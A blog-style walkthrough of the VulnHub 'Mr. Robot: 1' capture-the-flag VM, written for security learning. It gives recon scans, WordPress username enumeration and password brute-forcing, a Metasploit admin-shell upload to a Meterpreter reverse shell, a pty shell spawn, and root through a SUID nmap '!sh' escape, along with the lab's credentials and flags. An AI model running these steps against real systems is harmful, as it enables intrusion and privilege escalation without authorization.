As an Amazon Prime subscriber I noticed that the show Mr. Robot is now available for no extra cost. Since I’ve heard a lot about the show, I was curious to see what the fuss was all about. When I was watching it and got over the initial cringe factor of some of the overtly techno-jargon dialog, I was motivated to hit up VulnHub and see if there were any new Boot2Roots that looked interesting. Lo and behold I saw Mr. Robot:1.
The description for this challenge is:
This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.
First I need to find the IP of the target so I fireup Netdiscover:
root@Oak:~# netdiscover -r 10.0.2.0/24 Currently scanning: Finished! | Screen View: Unique Hosts 4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 10.0.2.1 52:54:00:12:35:00 1 60 Unknown vendor 10.0.2.2 52:54:00:12:35:00 1 60 Unknown vendor 10.0.2.3 08:00:27:f6:13:d8 1 60 Cadmus Computer Systems 10.0.2.33 08:00:27:c3:f8:59 1 60 Cadmus Computer Systems
root@Oak:~# nmap -p- -A -sV -T5 10.0.2.33 Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-11 10:51 EDT Nmap scan report for 10.0.2.33 Host is up (0.00029s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd |_http-server-header: Apache |_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http Apache httpd |_http-server-header: Apache |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=www.example.com | Not valid before: 2015-09-16T10:45:03 |_Not valid after: 2025-09-13T10:45:03 MAC Address: 08:00:27:C3:F8:59 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.10 - 4.1 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.29 ms 10.0.2.33 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 70.07 seconds
Interesting, only 80 and 443. Let’s see what we have here, I think Nikto will get the job done nicely…
root@Oak:~# nikto -h http://10.0.2.33 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.0.2.33 + Target Hostname: 10.0.2.33 + Target Port: 80 + Start Time: 2016-07-11 10:55:43 (GMT-4) --------------------------------------------------------------------------- + Server: Apache + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Retrieved x-powered-by header: PHP/5.5.29 + No CGI Directories found (use '-C all' to force check all possible dirs) + Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php + OSVDB-3092: /admin/: This might be interesting... + Uncommon header 'link' found, with contents: <http://10.0.2.33/?p=23>; rel=shortlink + /ampache/update.php: Ampache update page is visible. + /readme.html: This WordPress file reveals the installed version. + /wp-links-opml.php: This WordPress script reveals the installed version. + OSVDB-3092: /license.txt: License file found may identify site software. + /admin/index.html: Admin login page/section found. + Cookie wordpress_test_cookie created without the httponly flag + /wp-login/: Admin login page/section found. + /wordpress/: A WordPress installation was found. + /wp-login.php?action=register: WordPress registration enabled + /wp-admin/wp-login.php: WordPress login found + /blog/wp-login.php: WordPress login found + /wp-login.php: WordPress login found + 7535 requests: 0 error(s) and 20 item(s) reported on remote host + End Time: 2016-07-11 11:00:45 (GMT-4) (302 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Ahh, ok so this is a WordPress site. Let’s take a look at what Nikto found and see if we can glean some interesting information.
The Robots.txt file contained the 1st of 3 keys along with a dictionary file.
User-agent: * fsocity.dic key-1-of-3.txt
Key #1: 073403c8a58a1f80d943455fb30724b9
I found what appears to be a password while looking at the License.txt file. Hiding in plain sight. Very interesting….
The license.txt file contained some interesting taunts.
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty? [White Space Removed] do you want a password or something? [White Space Removed] ZWxsaW90OkVSMjgtMDY1Mgo=
Hmm, I wonder what this password goes to? (At the time I did not realize this was base64 encoded. I should have recognized the formatting, but I didn’t so I wasted a lot of time on the next part.)
Well, since it’s a WordPress site, I launched WPscan against it.
root@Oak:~# wpscan -u http://10.0.2.33 -e vp _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_____/ \___|\__,_|_| WordPress Security Scanner by the WPScan Team Version 2.9.1 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_ _______________________________________________________________ [+] URL: http://10.0.2.33/ [+] Started: Mon Jul 11 11:17:58 2016 [+] robots.txt available under: 'http://10.0.2.33/robots.txt' [!] The WordPress 'http://10.0.2.33/readme.html' file exists exposing a version number [+] Interesting header: SERVER: Apache [+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN [+] Interesting header: X-MOD-PAGESPEED: 18.104.22.168-4523 [!] Registration is enabled: http://10.0.2.33/wp-login.php?action=register [+] XML-RPC Interface available under: http://10.0.2.33/xmlrpc.php [+] WordPress version 4.3.4 identified from advanced fingerprinting (Released on 2016-05-06) [!] 3 vulnerabilities identified from the version number [!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS Reference: https://wpvulndb.com/vulnerabilities/8518 Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/ Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834 [i] Fixed in: 4.3.5 [!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure Reference: https://wpvulndb.com/vulnerabilities/8519 Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/ Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1 Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/ Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835 [i] Fixed in: 4.3.5 [!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post Reference: https://wpvulndb.com/vulnerabilities/8520 Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/ Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837 [i] Fixed in: 4.3.5 [+] Enumerating installed plugins (only ones with known vulnerabilities) ... Time: 00:01:02 <=======================> (1344 / 1344) 100.00% Time: 00:01:02 [+] We found 6 plugins: [+] Name: akismet | Latest version: 3.1.11 | Location: http://10.0.2.33/wp-content/plugins/akismet/ [!] We could not determine a version so all vulnerabilities are printed out [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS) Reference: https://wpvulndb.com/vulnerabilities/8215 Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/ Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html [i] Fixed in: 3.1.5 [+] Name: all-in-one-seo-pack - v2.0.4 | Location: http://10.0.2.33/wp-content/plugins/all-in-one-seo-pack/ | Readme: http://10.0.2.33/wp-content/plugins/all-in-one-seo-pack/readme.txt [!] The version is out of date, the latest version is 22.214.171.124 [!] Title: All in One SEO Pack <= 2.1.5 - aioseop_functions.php new_meta Parameter XSS Reference: https://wpvulndb.com/vulnerabilities/6888 Reference: http://blog.sucuri.net/2014/05/vulnerability-found-in-the-all-in-one-seo-pack-wordpress-plugin.html [i] Fixed in: 2.1.6 [!] Title: All in One SEO Pack <= 2.1.5 - Unspecified Privilege Escalation Reference: https://wpvulndb.com/vulnerabilities/6889 Reference: http://blog.sucuri.net/2014/05/vulnerability-found-in-the-all-in-one-seo-pack-wordpress-plugin.html [i] Fixed in: 2.1.6 [!] Title: All in One SEO Pack <= 126.96.36.199 - Authentication Bypass Reference: https://wpvulndb.com/vulnerabilities/7881 Reference: http://jvn.jp/en/jp/JVN75615300/index.html Reference: http://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/ Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0902 [i] Fixed in: 2.2.6 [!] Title: All in One SEO Pack <= 188.8.131.52 - Cross-Site Scripting (XSS) Reference: https://wpvulndb.com/vulnerabilities/7916 Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html [i] Fixed in: 184.108.40.206 [+] Name: all-in-one-wp-migration - v2.0.4 | Location: http://10.0.2.33/wp-content/plugins/all-in-one-wp-migration/ | Readme: http://10.0.2.33/wp-content/plugins/all-in-one-wp-migration/readme.txt [!] The version is out of date, the latest version is 5.44 [!] Title: All-in-One WP Migration <= 2.0.4 - Unauthenticated Database Export Reference: https://wpvulndb.com/vulnerabilities/7857 Reference: http://www.pritect.net/blog/all-in-one-wp-migration-2-0-4-security-vulnerability Reference: https://www.rapid7.com/db/modules/auxiliary/gather/wp_all_in_one_migration_export [i] Fixed in: 2.0.5 [+] Name: google-analytics-for-wordpress - v5.3.2 | Location: http://10.0.2.33/wp-content/plugins/google-analytics-for-wordpress/ | Readme: http://10.0.2.33/wp-content/plugins/google-analytics-for-wordpress/readme.txt [!] The version is out of date, the latest version is 5.5.2 [!] Title: Google Analytics by Yoast <= 5.3.2 - Cross-Site Scripting (XSS) Reference: https://wpvulndb.com/vulnerabilities/7838 Reference: http://packetstormsecurity.com/files/130716/ [i] Fixed in: 5.3.3 [!] Title: Google Analytics by Yoast <= 5.3.2 - Stored Cross-Site Scripting (XSS) Reference: https://wpvulndb.com/vulnerabilities/7856 Reference: https://yoast.com/ga-plugin-security-update-more/ Reference: http://klikki.fi/adv/yoast_analytics.html Reference: http://packetstormsecurity.com/files/130935/ [i] Fixed in: 5.3.3 [!] Title: Google Analytics by Yoast <= 5.3.3 - Unauthenticated Cross-Site Scripting (XSS) Reference: https://wpvulndb.com/vulnerabilities/7914 Reference: https://yoast.com/coordinated-security-release/ Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html Reference: http://klikki.fi/adv/yoast_analytics2.html [i] Fixed in: 5.4 [!] Title: Google Analytics by Yoast <= 5.4.4 - Authenticated Stored Cross-Site Scripting (XSS) Reference: https://wpvulndb.com/vulnerabilities/8147 Reference: https://security.dxw.com/advisories/xss-in-google-analytics-by-yoast-premium-by-privileged-users/ [i] Fixed in: 5.4.5 [+] Name: jetpack - v3.3.2 | Location: http://10.0.2.33/wp-content/plugins/jetpack/ | Readme: http://10.0.2.33/wp-content/plugins/jetpack/readme.txt [!] The version is out of date, the latest version is 4.1.1 [!] Title: Jetpack 3.0-3.4.2 - Cross-Site Scripting (XSS) Reference: https://wpvulndb.com/vulnerabilities/7915 Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html Reference: https://jetpack.me/2015/04/20/jetpack-3-4-3-coordinated-security-update/ [i] Fixed in: 3.4.3 [!] Title: Jetpack <= 3.5.2 - Unauthenticated DOM Cross-Site Scripting (XSS) Reference: https://wpvulndb.com/vulnerabilities/7964 Reference: https://blog.sucuri.net/2015/05/jetpack-and-twentyfifteen-vulnerable-to-dom-based-xss-millions-of-wordpress-websites-affected-millions-of-wordpress-websites-affected.html [i] Fixed in: 3.5.3 [!] Title: Jetpack <= 3.7.0 - Stored Cross-Site Scripting (XSS) Reference: https://wpvulndb.com/vulnerabilities/8201 Reference: https://jetpack.me/2015/09/30/jetpack-3-7-1-and-3-7-2-security-and-maintenance-releases/ Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-jetpack.html [i] Fixed in: 3.7.1 [!] Title: Jetpack <= 3.7.0 - Information Disclosure Reference: https://wpvulndb.com/vulnerabilities/8202 Reference: https://jetpack.me/2015/09/30/jetpack-3-7-1-and-3-7-2-security-and-maintenance-releases/ [i] Fixed in: 3.7.1 [!] Title: Jetpack <= 3.9.1 - LaTeX HTML Element XSS Reference: https://wpvulndb.com/vulnerabilities/8472 Reference: https://jetpack.com/2016/02/25/jetpack-3-9-2-maintenance-and-security-release/ Reference: https://github.com/Automattic/jetpack/commit/dbc33b9105c4dbb0de81544e682a8b6d5ab7e446 [i] Fixed in: 3.9.2 [!] Title: Jetpack 2.0-4.0.2 - Shortcode Stored Cross-Site Scripting (XSS) Reference: https://wpvulndb.com/vulnerabilities/8500 Reference: https://jetpack.com/2016/05/27/jetpack-4-0-3-critical-security-update/ Reference: http://wptavern.com/jetpack-4-0-3-patches-a-critical-xss-vulnerability Reference: https://blog.sucuri.net/2016/05/security-advisory-stored-xss-jetpack-2.html [i] Fixed in: 4.0.3 [!] Title: Jetpack <= 4.0.3 - Multiple Vulnerabilities Reference: https://wpvulndb.com/vulnerabilities/8517 Reference: https://jetpack.com/2016/06/20/jetpack-4-0-4-bug-fixes/ [i] Fixed in: 4.0.4 [+] Name: wptouch - v3.7.3 | Location: http://10.0.2.33/wp-content/plugins/wptouch/ | Readme: http://10.0.2.33/wp-content/plugins/wptouch/readme.txt [!] The version is out of date, the latest version is 4.1.7 [!] Title: WPtouch Mobile Plugin <= 220.127.116.11 - Cross-Site Scripting (XSS) Reference: https://wpvulndb.com/vulnerabilities/7920 Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html [i] Fixed in: 3.7.6 [+] Finished: Mon Jul 11 11:19:07 2016 [+] Requests Done: 1412 [+] Memory used: 70.09 MB [+] Elapsed time: 00:01:09
Lot’s of vulnerable plug-ins. WordPress is out of date, but no RCE’s are available for anything listed.
Now I needed a way in. I figured the dictionary file would be the key to get into the WordPress site, I just needed an username. WPscan was no help there.
I tried to manually guess usernames based off of the characters names from the show and see if the failed login error message was any help. And indeed it was!
When attempting to login with an username that doesn’t exist, you get the following error message:
ERROR: Invalid username.
However, when you attempt to do the same with an existing username, the message changes:
ERROR: The password you entered for the username elliot is incorrect.
Excellent, now I know the username, let’s go all brute on it and force my way in!
I read somewhere that WPscan bruteforce was faster than THC-Hydra, so back to WPScan for this task.
[+] Enumerating plugins from passive detection ... [+] No plugins found [+] Starting the password brute forcer [+] [SUCCESS] Login : elliot Password : ER28-0652 Brute Forcing 'elliot' Time: 05:35:13 <========> (858160 / 858161) 99.99% ETA: 00:00:00 +----+--------+------+-----------+ | Id | Login | Name | Password | +----+--------+------+-----------+ | | elliot | | ER28-0652 | +----+--------+------+-----------+ [+] Finished: Mon Jul 10 05:37:53 2016 [+] Requests Done: 858204 [+] Memory used: 18.516 MB [+] Elapsed time: 05:35:14</pre> It took about 5 and a half hours, but it finally finished! (Again, I could have saved time if I was more thoughtful. The base64 encoded <a href="http://ZWxsaW90OkVSMjgtMDY1Mgo=">password</a> I found earlier decoded to elliot:ER28-0652) Now that I had a username and password I could log in and look around. Unfortunalty I didn't see anything too interesting. Next, I fired up msfconsole and used the wp_admin_shell_upload exploit. <pre>msf exploit(wp_admin_shell_upload) > info Name: WordPress Admin Shell Upload Module: exploit/unix/webapp/wp_admin_shell_upload Platform: PHP Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2015-02-21 Provided by: Rob Carr <email@example.com> Available targets: Id Name -- ---- 0 WordPress Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD ER28-0652 yes The WordPress password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 10.0.2.33 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the wordpress application USERNAME elliot yes The WordPress username to authenticate with VHOST no no HTTP server virtual host Payload information: Description: This module will generate a plugin, pack the payload into it and upload it to a server running WordPress providing valid admin credentials are used.</pre> At first it wouldn't work. The exploit did not want to believe that it was a WordPress site. <pre>msf exploit(wp_admin_shell_upload) > run [*] Started reverse TCP handler on 10.0.2.33:4444 [-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress [*] Exploit completed, but no session was created.</pre> So I went into the ruby code and bypassed the WP check. <pre> Reloading module...
My second attempt was much better, BAM we have a Meterpreter session!
msf exploit(wp_admin_shell_upload) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter php/php daemon (1) @ linux 10.0.2.32:4444 -> 10.0.2.33:55928 (10.0.2.33)
I took a look around and booYah! Key #2 found!
meterpreter > ls Listing: /home/robot ==================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100400/r-------- 33 fil 2015-11-13 02:28:21 -0500 key-2-of-3.txt 100644/rw-r--r-- 39 fil 2015-11-13 02:28:21 -0500 password.raw-md5
Not so fast Danielson… the current user cannot read the key text file, but I can read the password.raw-md5 file.
meterpreter > cat key-2-of-3.txt [-] core_channel_open: Operation failed: 1 meterpreter > cat password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b meterpreter >
Simple Google search of that MD5 string revealed the password…
I drop into a shell, spawn a bash shell using Python and change the user to robot
meterpreter > shell Process 6231 created. Channel 15 created. python -c 'import pty;pty.spawn("/bin/bash")' daemon@linux:/home/robot$ su robot su robot Password: abcdefghijklmnopqrstuvwxyz robot@linux:~$ cat /home/robot/key-2-of-3.txt cat /home/robot/key-2-of-3.txt 822c73956184f694993bede3eb39f959 robot@linux:~$
Now I can say booYah! Key #2 found!
Ok now I need to escalate.
I do some recon for privilege escalation exploits and I find that nmap is suid to root.
robot@linux:~$ find / -perm -u=s -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null /bin/ping /bin/umount /bin/mount /bin/ping6 /bin/su /usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/local/bin/nmap /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/pt_chown
Nmap has an interactive feature with a nice escape sequence that opens the keys to the kingdom when incorrectly configured.
robot@linux:~$ nmap --interactive nmap --interactive Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h for help nmap> !sh !sh # id id uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot) #
Shazam! I have root. Or as Mati would say, “nice”.
Key 3 is in the bag!
cat /root/key-3-of-3.txt 04787ddef27c3dee1ee161b21670b4e4
This was a fun Boot2Root that complimented the show nicely. The method to complete this challenge was similar to what was learned in the PWK course. I look forward to future Mr.Robot challenges. Now I must decide if I want to pay to watch season 2 or wait until it comes out on Amazon. Stay tuned for the next pwnventure!
- Basic Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- Mr-Robot: 1: https://www.vulnhub.com/entry/mr-robot-1,151/
- Penetration Testing Training with Kali Linux: https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/